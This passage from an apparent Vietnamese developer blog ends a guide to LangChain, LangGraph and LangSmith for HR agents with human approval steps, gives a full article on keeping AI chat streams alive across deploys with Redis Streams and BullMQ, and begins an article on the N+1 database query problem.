<p>Nên bật LangSmith sớm, kể cả ở prototype.</p>
<h5 id="li4khngcevaluationdataset">Lỗi 4: Không có evaluation dataset</h5>
<p>Đừng đánh giá AI bằng cảm giác. Hãy tạo dataset gồm các case:</p>
<ul>
<li>CV phù hợp,</li>
<li>CV không phù hợp,</li>
<li>thiếu thông tin,</li>
<li>yêu cầu gửi email,</li>
<li>yêu cầu cần approval,</li>
<li>policy-sensitive.</li>
</ul>
<h5 id="li5khngkimsotquyntool">Lỗi 5: Không kiểm soát quyền tool</h5>
<p>Tool càng nguy hiểm càng cần kiểm soát.</p>
<pre><code class="language-text">search_candidates       → có thể cho phép
get_candidate_cv        → log access
send_email              → cần approval
update_pipeline_status  → cần approval / permission
send_offer_letter       → bắt buộc human approval
</code></pre>
<hr>
<h4 id="23ktlun">23. Kết luận</h4>
<p>Nếu chỉ nhớ một đoạn, hãy nhớ đoạn này:</p>
<pre><code class="language-text">LangChain giúp AI có khả năng.
LangGraph giúp AI làm việc theo quy trình.
LangSmith giúp team tin được, debug được và cải thiện được AI.
</code></pre>
<p>Với bài toán HR:</p>
<ul>
<li>Chỉ tóm tắt CV → <strong>LangChain</strong> là đủ.</li>
<li>Cần tìm ứng viên, chấm điểm, soạn email, chờ duyệt → thêm <strong>LangGraph</strong>.</li>
<li>Muốn biết vì sao agent sai, đo chất lượng, theo dõi cost/latency → dùng <strong>LangSmith</strong>.</li>
</ul>
<p>Công thức thực dụng:</p>
<pre><code class="language-text">Prototype nhanh:
  LangChain + LangSmith

Workflow có approval:
  LangChain + LangGraph + LangSmith

Production agent:
  LangChain components
  + LangGraph orchestration
  + LangSmith observability/evaluation
</code></pre>
<p>Điểm quan trọng nhất: AI không nên thay HR hoàn toàn.</p>
<p>AI nên đóng vai <strong>HR Copilot</strong>:</p>
<ul>
<li>làm nhanh phần lặp lại,</li>
<li>tổng hợp thông tin,</li>
<li>đề xuất ứng viên,</li>
<li>soạn nháp email,</li>
<li>giải thích lý do,</li>
<li>còn con người vẫn giữ quyền quyết định ở các bước quan trọng.</li>
</ul>
<p>Một agent tốt không phải là agent “tự làm tất cả”. Một agent tốt là agent <strong>làm đúng phần nên tự động hóa, biết dừng đúng lúc, và để con người kiểm soát những quyết định quan trọng</strong>.</p>
<hr>
<h3 id="phlcacheatsheetthutng">Phụ lục A — Cheat sheet thuật ngữ</h3>
<table>
<thead>
<tr>
<th>Thuật ngữ</th>
<th>Giải thích ngắn</th>
<th>Ví dụ HR</th>
</tr>
</thead>
<tbody>
<tr>
<td>LLM</td>
<td>Large Language Model</td>
<td>GPT/Claude đọc CV và sinh nhận xét</td>
</tr>
<tr>
<td>Prompt</td>
<td>Instruction gửi cho LLM</td>
<td>“Đánh giá CV này theo JD sau”</td>
</tr>
<tr>
<td>Prompt Template</td>
<td>Prompt có biến</td>
<td><code>{cv}</code>, <code>{jd}</code>, <code>{criteria}</code></td>
</tr>
<tr>
<td>Chain</td>
<td>Pipeline tuyến tính</td>
<td>Prompt → LLM → JSON</td>
</tr>
<tr>
<td>Tool</td>
<td>Function/API agent có thể gọi</td>
<td><code>search_candidates()</code></td>
</tr>
<tr>
<td>RAG</td>
<td>Search tài liệu rồi mới trả lời</td>
<td>Hỏi policy tuyển dụng nội bộ</td>
</tr>
<tr>
<td>Retriever</td>
<td>Thành phần tìm tài liệu liên quan</td>
<td>Search JD/policy/CV notes</td>
</tr>
<tr>
<td>Agent</td>
<td>LLM quyết định bước/tool tiếp theo</td>
<td>Tìm ứng viên rồi soạn email</td>
</tr>
<tr>
<td>State</td>
<td>Dữ liệu hiện tại của workflow</td>
<td>JD, candidates, score, email draft</td>
</tr>
<tr>
<td>Node</td>
<td>Một bước trong graph</td>
<td><code>score_candidates</code></td>
</tr>
<tr>
<td>Edge</td>
<td>Đường nối giữa các node</td>
<td>score cao → draft email</td>
</tr>
<tr>
<td>Conditional Edge</td>
<td>Rẽ nhánh theo điều kiện</td>
<td>approve → send, reject → stop</td>
</tr>
<tr>
<td>Checkpoint</td>
<td>Lưu trạng thái để resume</td>
<td>Chờ HR duyệt email</td>
</tr>
<tr>
<td>Trace</td>
<td>Log chi tiết toàn bộ execution</td>
<td>Xem agent đã gọi tool nào</td>
</tr>
<tr>
<td>Evaluation</td>
<td>Test chất lượng agent</td>
<td>Dataset CV/JD mẫu</td>
</tr>
<tr>
<td>Monitoring</td>
<td>Theo dõi production</td>
<td>cost, latency, error rate</td>
</tr>
</tbody>
</table>
<hr>
<h3 id="phlcbngunthamkho">Phụ lục B — Nguồn tham khảo</h3>
<h4 id="tiliuchnhthc">Tài liệu chính thức</h4>
<ul>
<li>LangChain GitHub: <a href="https://github.com/langchain-ai/langchain">https://github.com/langchain-ai/langchain</a></li>
<li>LangGraph Overview: <a href="https://docs.langchain.com/oss/python/langgraph/overview">https://docs.langchain.com/oss/python/langgraph/overview</a></li>
<li>LangSmith Overview: <a href="https://docs.langchain.com/langsmith/home">https://docs.langchain.com/langsmith/home</a></li>
<li>LangGraph Graph API: <a href="https://docs.langchain.com/oss/python/langgraph/graph-api">https://docs.langchain.com/oss/python/langgraph/graph-api</a></li>
<li>LangGraph Persistence: <a href="https://docs.langchain.com/oss/python/langgraph/persistence">https://docs.langchain.com/oss/python/langgraph/persistence</a></li>
<li>LangGraph Subgraphs: <a href="https://docs.langchain.com/oss/python/langgraph/use-subgraphs">https://docs.langchain.com/oss/python/langgraph/use-subgraphs</a></li>
<li>LangSmith Observability: <a href="https://docs.langchain.com/langsmith/observability">https://docs.langchain.com/langsmith/observability</a></li>
<li>LangSmith Evaluation: <a href="https://docs.langchain.com/langsmith/evaluation">https://docs.langchain.com/langsmith/evaluation</a></li>
</ul>
<h4 id="nntnglthuyt">Nền tảng lý thuyết</h4>
<ul>
<li>Yao et al. (2022), <em>ReAct: Synergizing Reasoning and Acting in Language Models</em>: <a href="https://arxiv.org/abs/2210.03629">https://arxiv.org/abs/2210.03629</a></li>
<li>Shinn et al. (2023), <em>Reflexion: Language Agents with Verbal Reinforcement Learning</em>: <a href="https://arxiv.org/abs/2303.11366">https://arxiv.org/abs/2303.11366</a></li>
<li>Xi, Chen et al. (2023), <em>The Rise and Potential of LLM-Based Agents: A Survey</em>: <a href="https://arxiv.org/abs/2309.07864">https://arxiv.org/abs/2309.07864</a></li>
</ul>
<h4 id="kintrcthitk">Kiến trúc & thiết kế</h4>
<ul>
<li>LangChain Core — Runnable API: <a href="https://python.langchain.com/api_reference/core/runnables/langchain_core.runnables.base.Runnable.html">https://python.langchain.com/api_reference/core/runnables/langchain_core.runnables.base.Runnable.html</a></li>
<li>LangChain — LCEL: <a href="https://python.langchain.com/docs/concepts/lcel/">https://python.langchain.com/docs/concepts/lcel/</a></li>
<li>LangGraph GitHub: <a href="https://github.com/langchain-ai/langgraph">https://github.com/langchain-ai/langgraph</a></li>
<li>LangGraph Pregel runtime: <a href="https://docs.langchain.com/oss/python/langgraph/pregel">https://docs.langchain.com/oss/python/langgraph/pregel</a></li>
<li>LangGraph Durable Execution: <a href="https://docs.langchain.com/oss/python/langgraph/durable-execution">https://docs.langchain.com/oss/python/langgraph/durable-execution</a></li>
<li>LangSmith OpenTelemetry: <a href="https://blog.langchain.com/opentelemetry-langsmith/">https://blog.langchain.com/opentelemetry-langsmith/</a></li>
<li>LangSmith trace with OpenTelemetry: <a href="https://docs.langchain.com/langsmith/trace-with-opentelemetry">https://docs.langchain.com/langsmith/trace-with-opentelemetry</a></li>
</ul>
<h4 id="sosnhframework">So sánh framework</h4>
<ul>
<li>LangChain — AI Agent Frameworks: <a href="https://www.langchain.com/resources/ai-agent-frameworks">https://www.langchain.com/resources/ai-agent-frameworks</a></li>
<li>Các bài so sánh framework từ cộng đồng như dev.to, theflyingbirds.in, aryaxai.com. Phần này chỉ nên dùng để tham khảo định hướng, không thay thế việc đọc tài liệu chính thức.</li>
</ul>
<!--kg-card-end: markdown-->
</article>
<article>
<h1>Khắc phục lỗi gián đoạn hội thoại AI khi triển khai phiên bản mới</h1>
<p>P.B.N — Mon, 29 Jun 2026 05:34:21 GMT</p>
<!--kg-card-begin: markdown--><blockquote>
<p><strong>Lưu ý:</strong> Bài viết này không có mã nguồn minh họa. Giải pháp được đề cập vẫn đang trong quá trình review nội bộ nên mình chưa thể chia sẻ phần triển khai cụ thể. Đây là bản tóm tắt những gì mình tìm hiểu được trong tuần qua: hệ thống hiện tại hoạt động như thế nào, tại sao nó gặp lỗi, và một giải pháp phù hợp có thể trông ra sao.</p>
</blockquote>
<p>Mình đang làm việc trên một ứng dụng chat AI sử dụng <strong>Next.js</strong> ở frontend, <strong>NestJS</strong> ở backend và <strong>GraphQL</strong> để giao tiếp giữa hai bên. Người dùng gửi câu hỏi tới các mô hình ngôn ngữ lớn (LLM) và quan sát câu trả lời được stream từng token theo thời gian thực.</p>
<p>Dưới đây là phần TL;DR:</p>
<blockquote>
<p><strong>Mỗi lần deploy phiên bản mới, tất cả các cuộc trò chuyện đang được tạo nội dung đều bị dừng giữa chừng.</strong></p>
<p>Trạng thái stream hiện đang được lưu trong bộ nhớ (memory) của API server, và lời gọi tới LLM cũng chạy ngay trong process đó. Khi deploy, process bị khởi động lại, khiến toàn bộ state bị mất và lời gọi LLM bị hủy giữa chừng. Trình duyệt của người dùng tiếp tục chờ dữ liệu nhưng không nhận được gì, và phần nội dung đã được tạo ra trước đó cũng biến mất hoàn toàn.</p>
<p><strong>Giải pháp là không lưu bất kỳ trạng thái quan trọng nào trong API server nữa.</strong></p>
<p>Chuyển luồng token sang Redis Streams, chuyển việc gọi LLM sang một worker độc lập sử dụng BullMQ, đồng thời cho phép trình duyệt tự động reconnect và tiếp tục từ vị trí đã nhận cuối cùng. Sau khi thực hiện điều này, việc deploy trở nên "vô hình" với người dùng: quá trình sinh nội dung vẫn tiếp tục chạy và trình duyệt chỉ việc bắt kịp những gì đã bỏ lỡ.</p>
</blockquote>
<p>Phần còn lại của bài viết sẽ giải thích chi tiết quá trình đi tới kết luận đó.</p>
<hr>
<h1 id="cchhthngstreamchathintihotng">Cách hệ thống stream chat hiện tại hoạt động</h1>
<p>Hệ thống hiện tại được thiết kế để xử lý hai tình huống:</p>
<h3 id="kchbna">Kịch bản A</h3>
<p>Người dùng gửi tin nhắn và ngồi xem phản hồi được stream theo thời gian thực.</p>
<h3 id="kchbnb">Kịch bản B</h3>
<p>Người dùng refresh trang hoặc mở tab mới trong khi quá trình sinh nội dung vẫn đang diễn ra, và hệ thống cần gửi lại phần nội dung đã tạo trước đó.</p>
<p>Luồng xử lý chính (kịch bản A) như sau:</p>
<pre><code class="language-text">Trình duyệt                     API Server
   │                                │
   │  1. issueToken                 │
   │ ──────────────────────────────►│
   │ ◄──────────────────────────────│
   │                                │
   │  2. prepareBackground          │
   │ ──────────────────────────────►│
   │ ◄────────── historyId ─────────│
   │                                │
   │  3. startBackground            │
   │ ──────────────────────────────►│
   │ ◄────────── historyId ─────────│
   │                                │
   │  4. subscribe(continueStream)  │
   │ ──────────────────────────────►│
   │ ◄═══════ tokens stream   ══════│
</code></pre>
<p>Một số điểm quan trọng:</p>
<h3 id="1issuetoken">1. issueToken</h3>
<p>Chỉ dùng để xác thực cuộc hội thoại. Chưa có dữ liệu nào được lưu.</p>
<h3 id="2preparebackground">2. prepareBackground</h3>
<p>Tạo một bản ghi <code>SessionHistory</code> rỗng trong database và khởi tạo một đối tượng <code>stateToken</code> trong bộ nhớ.</p>
<p><code>stateToken</code> là nhân vật chính của câu chuyện này:</p>
<ul>
<li>Lưu toàn bộ lịch sử hội thoại hiện tại</li>
<li>Lưu các token đã stream</li>
<li>Có TTL 15 phút</li>
<li>Chỉ tồn tại trong RAM của API server</li>
</ul>
<h3 id="3startbackground">3. startBackground</h3>
<p>Không chờ LLM trả kết quả.</p>
<p>Thay vào đó:</p>
<ul>
<li>Xác thực token</li>
<li>Lấy distributed lock theo <code>historyId:model</code></li>
<li>Gọi xử lý AI trong background thông qua <code>setImmediate()</code></li>
<li>Trả về <code>historyId</code> ngay lập tức</li>
</ul>
<h3 id="4continuestream">4. continueStream</h3>
<p>Đây là GraphQL Subscription.</p>
<p>Khi client kết nối:</p>
<ol>
<li>Server gửi lại toàn bộ token đang được lưu trong <code>stateToken</code></li>
<li>Sau đó stream các token mới nhận được qua Redis Pub/Sub</li>
</ol>
<p>Nhờ cơ chế này, client có thể kết nối lại bất kỳ lúc nào mà không bị mất nội dung đã tạo trước đó.</p>
<hr>
<h1 id="refreshgiachnghotngnhthno">Refresh giữa chừng hoạt động như thế nào?</h1>
<p>Khi người dùng refresh trang:</p>
<ol>
<li>
<p>Client gọi <code>checkActiveStreams</code></p>
</li>
<li>
<p>Nếu <code>stateToken</code> vẫn còn trong memory:</p>
<ul>
<li>Server trả về danh sách model đang chạy</li>
<li>Trả về phần nội dung đã được tạo</li>
</ul>
</li>
<li>
<p>Client subscribe lại với <code>isReconnecting=true</code></p>
</li>
<li>
<p>Server replay toàn bộ token trong <code>stateToken</code></p>
</li>
<li>
<p>Sau đó tiếp tục stream dữ liệu mới</p>
</li>
</ol>
<p>Thiết kế này khá gọn gàng.</p>
<p><strong>Nhưng toàn bộ cơ chế phụ thuộc vào việc <code>stateToken</code> còn tồn tại trong memory.</strong></p>
<p>Và đó chính là thứ bị xóa khi deploy.</p>
<hr>
<h1 id="vnthcs">Vấn đề thực sự</h1>
<p>Tóm tắt bằng một câu:</p>
<blockquote>
<p><code>stateToken</code> nằm trong bộ nhớ API server, và job gọi LLM cũng chạy trong chính process đó. Khi deploy, cả hai cùng mất.</p>
</blockquote>
<pre><code class="language-text">┌─────────────┐    ┌─────────────────────────────────────────┐    ┌─────────────────────┐
│   Browser   │    │              API Server                 │    │       Redis         │
│             │    │                                         │    │  (separate server)  │
│             │    │  ┌───────────────────────────────────┐  │    │                     │
│             │    │  │          Server Memory            │  │    │  Pub/Sub channel    │
└──────┬──────┘    │  │  · Token history (in-memory)      │  │    │  (broadcast only,   │
       │           │  │  · AI job (calls LLM, gets tokens)│  │    │   no persistence)   │
       │           │  │  · WebSocket connections          │  │    │                     │
       │ 1. Send   │  └───────────────┬───────────────────┘  │    └──────────┬──────────┘
       │──────────►│                  │                      │               │
       │           │   2. Calls LLM, receives tokens,        │               │
       │           │      stores each token in memory        │               │
       │           │                  │                      │               │
       │           │                  │ 3. Publish token ────┼──────────────►│
       │ 4. Token  │◄─────────────────┼──────────────────────┼───────────────│
       │◄──────────│                  │                      │
       │           └─────────────────────────────────────────┘
</code></pre>
<p>Hiện tại API server đang đảm nhiệm đồng thời ba vai trò:</p>
<ol>
<li>Lưu trạng thái stream trong memory</li>
<li>Gọi LLM và xử lý token</li>
<li>Quản lý kết nối WebSocket/GraphQL Subscription</li>
</ol>
<pre><code class="language-text">Trình duyệt
   │
   ▼
API Server
 ├─ StateToken (memory)
 ├─ AI Job (LLM call)
 └─ Kết nôi WebSocket
   │
   ▼
 Redis Pub/Sub
</code></pre>
<p>Khi deploy:</p>
<pre><code class="language-text">Deploy mới
   │
   ├─ API server khởi động lại
   │
   ├─ stateToken bị xóa
   ├─ LLM job bị kill
   └─ WebSocket bị ngắt
</code></pre>
<p>Kết quả:</p>
<ul>
<li>Trình duyệt vẫn chờ dữ liệu</li>
<li>Không có token nào tới nữa</li>
<li>Người dùng phải refresh thủ công</li>
<li>Phần nội dung đã sinh ra bị mất hoàn toàn</li>
</ul>
<hr>
<h1 id="giiphpxut">Giải pháp đề xuất</h1>
<p>Ý tưởng không có gì quá mới.</p>
<p>Theo nguyên lý của <strong>12-Factor App</strong>:</p>
<ul>
<li>Process nên stateless</li>
<li>Tiến trình chạy lâu nên được xử lý bởi background worker</li>
</ul>
<p>Hiện tại API server đang vi phạm cả hai nguyên tắc.</p>
<p>Giải pháp đề xuất gồm:</p>
<blockquote>
<p><strong>BullMQ + Redis Streams + State lưu trong Redis + Client Auto-Reconnect</strong></p>
</blockquote>
<p>Kiến trúc mới:</p>
<pre><code class="language-text">┌─────────────┐         ┌─────────────────┐        ┌──────────────────────┐
│   Browser   │         │   API Server    │        │   BullMQ Worker Pod  │
│             │         │  (stateless)    │        │   (independent)      │
└──────┬──────┘         └────────┬────────┘        └──────────┬───────────┘
       │                         │                            │
       │  1. Send chat message   │                            │
       │ ───────────────────────►│                            │
       │                         │  2. Add job to BullMQ      │
       │                         │ ──────────────────────────►│
       │  3. Return historyId    │                            │  4. Call LLM API
       │ ◄───────────────────────│                            │ ──────────►
       │                         │                            │
       │  5. Subscribe to stream │                            │  6. Receive tokens
       │ ───────────────────────►│                            │ ◄──────────
       │                         │                            │
       │                         │              ┌─────────────▼─────────────┐
       │                         │              │           Redis           │
       │                         │              │  Stream: conv:{historyId} │
       │                         │              │  1000-1 "The "            │
       │                         │              │  1000-2 "capital "        │
       │                         │              │  1000-3 "of "  ◄─ Worker  │
       │                         │◄─────────────│         writes here       │
       │◄────────────────────────│              │  API reads from here      │
       │  7. Receive tokens live │              └───────────────────────────┘
</code></pre>
<hr>
<h1 id="vaitrcatngthnhphn">Vai trò của từng thành phần</h1>
<h2 id="1bullmq">1. BullMQ</h2>
<p>BullMQ là job queue dựa trên Redis.</p>
<p>Thay vì API server gọi LLM trực tiếp:</p>
<pre><code class="language-text">API
  ↓
LLM
</code></pre>
<p>ta chuyển thành:</p>
<pre><code class="language-text">API
  ↓
Queue
  ↓
Worker
  ↓
LLM
</code></pre>
<p>Một phép so sánh dễ hiểu:</p>
<ul>
<li>API Server = nhân viên phục vụ</li>
<li>Worker = đầu bếp</li>
</ul>
<p>Nhân viên chỉ nhận order rồi chuyển xuống bếp.</p>
<p>Nhân viên không phải là người nấu ăn.</p>
<p>Nếu khu vực phục vụ gặp sự cố, nhà bếp vẫn tiếp tục hoạt động.</p>
<hr>
<h2 id="2workerpod">2. Worker Pod</h2>
<p>Worker là process độc lập chuyên:</p>
<ul>
<li>gọi LLM</li>
<li>nhận token</li>
<li>ghi token vào Redis Stream</li>
</ul>
<p>Worker không phụ thuộc API Server.</p>
<p>Do đó:</p>
<pre><code class="language-text">Deploy API
   ↓
Worker vẫn chạy
</code></pre>
<p>Nếu triển khai nhiều worker:</p>
<ul>
<li>worker A khởi động lại</li>
<li>worker B vẫn xử lý tiếp</li>
</ul>
<p>Tăng khả năng chịu lỗi đáng kể.</p>
<hr>
<h2 id="3redisstreams">3. Redis Streams</h2>
<p>Redis Stream là một append-only log.<br>
Redis stream thay thế cho Redis pub/sub để đơn giản hoá logic khi stream lại từ đoạn bị đứt giữa chừng.</p>
<p>Mỗi token được ghi thành một bản ghi có ID tăng dần:</p>
<pre><code class="language-text">1000-1  "The "
1000-2  "capital "
1000-3  "of "
1000-4  "France "
1000-5  "is "
1000-6  "Paris"
</code></pre>
<p>Điểm quan trọng:</p>
<p>Redis Stream:</p>
<ul>
<li>không thuộc API Server</li>
<li>không thuộc Worker</li>
</ul>
<p>Nó tồn tại độc lập.</p>
<p>Vì vậy dữ liệu không bị mất khi một trong hai thành phần kia khởi động lại.</p>
<hr>
<h2 id="4autoreconnectvlastid">4. Auto-Reconnect và lastId</h2>
<p>Trình duyệt lưu ID cuối cùng đã nhận:</p>
<pre><code class="language-text">lastId = "1000-47"
</code></pre>
<p>trong localStorage.</p>
<p>Khi mất kết nối:</p>
<ol>
<li>Trình duyệt tự reconnect</li>
<li>Gửi lại <code>lastId</code></li>
<li>Server đọc Redis Stream từ vị trí đó</li>
<li>Gửi lại những token bị bỏ lỡ</li>
</ol>
<hr>
<h1 id="cchreplayhotngrasao">Cơ chế replay hoạt động ra sao?</h1>
<h2 id="trnghpbnhthng">Trường hợp bình thường</h2>
<pre><code class="language-text">lastId = 0

1000-1
1000-2
1000-3
...
</code></pre>
<p>Browser cập nhật <code>lastId</code> liên tục.</p>
<hr>
<h2 id="ngtabrimli">Đóng tab rồi mở lại</h2>
<pre><code class="language-text">Tab đóng tại 1000-3

localStorage:
lastId = 1000-3
</code></pre>
<p>Mở lại:</p>
<pre><code class="language-text">resume from 1000-3
</code></pre>
<p>Server gửi tiếp:</p>
<pre><code class="language-text">1000-4
1000-5
1000-6
</code></pre>
<p>Người dùng thấy cuộc hội thoại tiếp tục như chưa từng gián đoạn.</p>
<hr>
<h2 id="deploygialcstream">Deploy giữa lúc stream</h2>
<pre><code class="language-text">lastId = 1000-47

API restart
</code></pre>
<p>Trong lúc đó:</p>
<pre><code class="language-text">Worker vẫn chạy

1000-48
1000-49
1000-50
...
</code></pre>
<p>được ghi tiếp vào Redis Stream.</p>
<p>Sau khi API mới lên:</p>
<pre><code class="language-text">Browser reconnect
lastId = 1000-47
</code></pre>
<p>Server đọc từ:</p>
<pre><code class="language-text">1000-48
</code></pre>
<p>và gửi tiếp.</p>
<p>Người dùng chỉ thấy khoảng dừng khoảng 1 giây.</p>
<hr>
<h1 id="saukhitrinkhaimtlndeploysdinrathno">Sau khi triển khai, một lần deploy sẽ diễn ra thế nào?</h1>
<pre><code class="language-text">Deploy
   │
   ├─ API server khởi động lại
   │
   ├─ Worker vẫn chạy
   ├─ LLM vẫn chạy
   ├─ Redis Stream vẫn ghi token
   │
   └─ Browser reconnect
         ↓
      gửi lastId
         ↓
      tiếp tục stream
</code></pre>
<p>Người dùng chỉ thấy một khoảng dừng rất ngắn thay vì mất toàn bộ cuộc hội thoại.</p>
<hr>
<h1 id="khnngmrng">Khả năng mở rộng</h1>
<p>Theo số liệu production:</p>
<pre><code class="language-text">44,885 thực thi/ngày

Giả sử 80% lưu lượng xảy ra trong 4 giờ cao điểm

44,885 * 0.8 / 4 / 60 ≈150 requests/phút

Thời gian stream trung bình:
1–2 phút

Thì streams đồng thời:
150–300
</code></pre>
<p>Các job này chủ yếu là:</p>
<pre><code class="language-text">IO-bound
</code></pre>
<p>vì phần lớn thời gian chỉ đang chờ LLM trả token.</p>
<p>BullMQ đặc biệt phù hợp với loại workload này.</p>
<p>Theo tài liệu của BullMQ:</p>
<pre><code class="language-text">Concurrency 100–300
</code></pre>
<p>trên một worker là hoàn toàn khả thi với các tác vụ IO-heavy.</p>
<p>Ước tính:</p>
<table>
<thead>
<tr>
<th>Concurrent Streams</th>
<th>Đánh giá</th>
</tr>
</thead>
<tbody>
<tr>
<td>~300</td>
<td>Dễ dàng xử lý</td>
</tr>
<tr>
<td>500</td>
<td>Không vấn đề</td>
</tr>
<tr>
<td>5,000</td>
<td>Scale ngang bằng cách thêm worker</td>
</tr>
<tr>
<td>50,000+</td>
<td>Cần xem xét Kafka hoặc giải pháp khác</td>
</tr>
</tbody>
</table>
<p>Trước khi BullMQ trở thành nút thắt cổ chai, rất có thể giới hạn của nhà cung cấp LLM hoặc chi phí API sẽ xuất hiện trước. Gọi cùng lúc 50k request thì khả năng cao phía LLM sẽ báo lỗi 429 too many request trước.</p>
<hr>
<h1 id="chiphhtng">Chi phí hạ tầng</h1>
<p>Gần như không đáng kể.</p>
<table>
<thead>
<tr>
<th>Thành phần</th>
<th>Chi phí</th>
</tr>
</thead>
<tbody>
<tr>
<td>Redis</td>
<td>Không đổi</td>
</tr>
<tr>
<td>API Server</td>
<td>Nhẹ hơn hiện tại</td>
</tr>
<tr>
<td>2 Worker Pods</td>
<td>Khoảng 20–50 USD/tháng</td>
</tr>
</tbody>
</table>
<hr>
<h1 id="khochtrinkhai">Kế hoạch triển khai</h1>
<h3 id="bc1">Bước 1</h3>
<p>Chuyển token sang Redis Streams.</p>
<ul>
<li>Khắc phục mất dữ liệu khi refresh</li>
<li>LLM vẫn chạy trong API</li>
</ul>
<h3 id="bc2">Bước 2</h3>
<p>Thêm BullMQ Worker.</p>
<ul>
<li>Tách LLM khỏi API</li>
<li>Generation sống sót qua deploy</li>
</ul>
<h3 id="bc3">Bước 3</h3>
<p>Thêm Auto-Reconnect + lastId.</p>
<ul>
<li>Không cần refresh thủ công</li>
<li>Trải nghiệm liền mạch</li>
</ul>
<hr>
<h1 id="sosnhbagiaion">So sánh ba giai đoạn</h1>
<table>
<thead>
<tr>
<th></th>
<th>Hiện tại</th>
<th>Chỉ Redis Streams</th>
<th>Giải pháp đầy đủ</th>
</tr>
</thead>
<tbody>
<tr>
<td>Token còn sau deploy</td>
<td>❌</td>
<td>✅</td>
<td>✅</td>
</tr>
<tr>
<td>Generation còn sau deploy</td>
<td>❌</td>
<td>❌</td>
<td>✅</td>
</tr>
<tr>
<td>Tự động khôi phục</td>
<td>❌</td>
<td>❌</td>
<td>✅</td>
</tr>
<tr>
<td>Hỗ trợ phản hồi 25 phút</td>
<td>Rủi ro cao</td>
<td>Vẫn rủi ro</td>
<td>✅</td>
</tr>
<tr>
<td>Chi phí thêm</td>
<td>0</td>
<td>0</td>
<td>~20–50 USD/tháng</td>
</tr>
</tbody>
</table>
<hr>
<h1 id="ktlun">Kết luận</h1>
<p>Điều quan trọng nhất rút ra từ quá trình điều tra không phải là BullMQ hay Redis Streams.</p>
<p>Mà là nhận ra nguyên nhân gốc rễ:</p>
<blockquote>
<p>API Server đang gánh quá nhiều trách nhiệm cùng lúc.</p>
</blockquote>
<p>Nó vừa:</p>
<ul>
<li>phục vụ request</li>
<li>chạy LLM</li>
<li>lưu trạng thái stream</li>
</ul>
<p>Ba chức năng này bị gắn chặt vào cùng một process nên cũng thất bại cùng nhau.</p>
<p>Một lần deploy đáng lẽ chỉ nên ảnh hưởng tới việc phục vụ request, chứ không nên giết chết một tác vụ AI đang chạy.</p>
<p>Dù giải pháp cuối cùng có giống hệt đề xuất này hay không, hướng đi đúng vẫn là:</p>
<ol>
<li>Đưa state ra khỏi process.</li>
<li>Tách job runner khỏi API server.</li>
<li>Để client tự theo dõi vị trí của mình trong stream.</li>
</ol>
<p>Mỗi bước đều giúp hệ thống ổn định hơn, và khi kết hợp lại, chúng biến một lỗi khó chịu trong production thành một sự kiện mà người dùng gần như không nhận ra.</p>
<h1 id="thamkho">Tham khảo</h1>
<ul>
<li><a href="https://12factor.net/processes">12 factor app</a></li>
<li><a href="https://bullmq.io/articles/benchmarks/bunjs-vs-nodejs/?utm_source=chatgpt.com">Benchmark BullMQ</a></li>
</ul>
<!--kg-card-end: markdown-->
</article>
<article>
<h1>N+1 Query và vấn đề của backend</h1>
<p>N.V.H — Sun, 28 Jun 2026 09:29:26 GMT</p>
<h1 id="khi-backend-ch-y-c-nh-ng-kh-ng-th-scale">Khi backend "chạy được" nhưng không thể scale</h1><p>Trong rất nhiều hệ thống backend hiện đại, đặc biệt là dùng <strong>GraphQL</strong> hay các thư viện như <strong>Prisma / TypeORM / Sequelize / Hibernate</strong> — có một vấn đề gần như mọi team đều từng gặp và xảy ra thường xuyên:</p><blockquote><strong>N+1 Query Problem</strong></blockquote><p>Điều nguy hiểm là N+1 thường <strong>không làm hệ thống chết ngay</strong>. Mà nó âm thầm, lặng lẽ làm:</p><ul><li>Tăng latency</li><li>Tăng CPU database</li><li>Ăn connection pool</li><li>Làm API chậm dần theo thời gian</li></ul><p>Cho đến khi production traffic tăng đủ lớn. Lúc đó:</p><ul><li>dashboard load tính bằng giây</li><li>graphQL timeout</li><li>RDS CPU 100%</li><li>Redis cũng không cứu nổi</li><li>Càng scaling thì cost tăng mạnh, nhưng vẫn không giải quyết được vấn đề</li></ul><p>Và phần nguy hiểm nhất chính là: <strong>code nhìn hoàn toàn "đúng"</strong>, clean, business theo yêu cầu — nhưng lại không thấy được vấn đề ngay lập tức. Team phải chờ đợi âm thầm... đến khi khách hàng phàn nàn <em>"web gì chậm như rùa"</em>.</p><hr><h2 id="1-v-y-n-1-query-l-g-">1. Vậy N+1 Query là gì?</h2><p>Có lẽ vấn đề này mọi develop đều đã biết hoặc đã từng nghe.</p><p>N+1 Query xảy ra khi:</p><ul><li><strong>1 query đầu tiên</strong> lấy danh sách dữ liệu chính</li><li>Sau đó phát sinh thêm <strong>N query khác</strong> để lấy dữ liệu liên quan cho từng item</li></ul><p>Ví dụ nếu có 100 users → <strong>1 + 100 = 101 queries</strong>.</p><h3 id="v-d-trong-restful-api">Ví dụ trong RESTful API</h3><pre><code class="language-js">// Backend tự loop:
const users = await getUsers();           // 1 query
for (const user of users) {
  user.posts = await getPostsByUser(user.id); // N queries
}
</code></pre><p>Khi số lượng users tăng lên, số query tăng theo tuyến tính. Đây chính là N+1 problem.</p><h3 id="v-d-trong-graphql">Ví dụ trong GraphQL</h3><p>GraphQL dễ gặp N+1 hơn vì cơ chế resolver hoạt động theo từng field.</p><pre><code class="language-graphql">// Schema
type User {
  id: ID
  name: String
  posts: [Post]
}

// Client query
query {
  users {
    name
    posts {
      title
    }
  }
}
</code></pre><pre><code class="language-js">// Resolver
const resolvers = {
  Query: {
    users: () => db.query("SELECT * FROM users"),
  },
  User: {
    posts: (user) => db.query(`SELECT * FROM posts WHERE user_id = ${user.id}`),
  },
};
</code></pre><p>Nếu có 100 users → 1 + 100 = <strong>101 queries</strong>.</p><hr><h2 id="t-i-sao-y-l-v-n-l-n">Tại sao đây là vấn đề lớn?</h2><p>Developer thường nghĩ: <em>"Mỗi query chỉ tốn vài ms, có gì đáng lo?"</em></p><p>Sai. Vì <strong>database query không miễn phí</strong>. Mỗi query đều cần:</p><ul><li>network roundtrip</li><li>parse SQL</li><li>query planning</li><li>locking</li><li>memory allocation</li><li>connection handling</li></ul><p>Khi traffic tăng, database bắt đầu nghẹt.</p><h3 id="v-n-nguy-hi-m-nh-t-code-nh-n-r-t-s-ch">Vấn đề nguy hiểm nhất: Code nhìn rất sạch<br></h3><p>Đây là lý do N+1 tồn tại lâu trong production.</p><pre><code class="language-js">const users = await User.findAll();
for (const user of users) {
  const posts = await user.getPosts(); // lazy loading
}
